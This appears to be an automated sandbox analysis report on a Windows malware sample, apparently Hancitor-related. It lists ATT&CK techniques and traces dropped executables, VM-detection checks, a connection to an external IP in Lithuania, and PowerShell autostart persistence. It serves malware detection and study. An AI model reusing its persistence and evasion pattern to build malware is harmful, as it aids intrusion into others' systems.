    Discovery: 1 Query Registry; 11 Security Software Discovery; 1 Process Discovery; 121 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 13 System Information Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
    Collection: 11 Input Capture; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
    Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Multiband Communication; Commonly Used Port
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
    Behavior Graph ID: 1637507 Sample: sBvrNv0wtb.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 48
    Signatures: Yara detected Hancitor; Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation; Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
    DNS/IP: star-azurefd-prod.trafficmanager.net; shed.dual-low.s-part-0039.t-0009.t-msedge.net; 4 other IPs or domains
    sBvrNv0wtb.exe (started)
      dropped: C:\Users\user\AppData\Local\Temp\918D.tmp, PE32+
      dropped: C:\Users\user\AppData\Local\Temp\872C.tmp, PE32
      872C.tmp (started)
        872C.tmp (started)
          signature: Query firmware table information (likely to detect VMs)
          OfficeClickToRun.exe (started)
            dropped: C:\Program Files\...\vcruntime140_1.dll, PE32+
            dropped: C:\Program Files\...\vcruntime140.dll, PE32+
            dropped: C:\Program Files\...\vccorlib140.dll, PE32+
            dropped: 213 other files (none is malicious)
          OfficeClickToRun.exe (started)
            DNS/IP: s-part-0039.t-0009.t-msedge.net 13.107.246.67, 443, 54614, 54619 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
      918D.tmp (started)
        DNS/IP: 141.98.10.54, 49698, 49701, 49702 HOSTBALTICLT Lithuania
        dropped: C:\Users\Public\Music\...\918D.tmp (copy), PE32+
        powershell.exe (started)
          dropped: C:\Users\user\AppData\Roaming\...\AsMus.lnk, MS
          signature: Powershell creates an autostart link
          conhost.exe (started)
    OpenWith.exe (started)
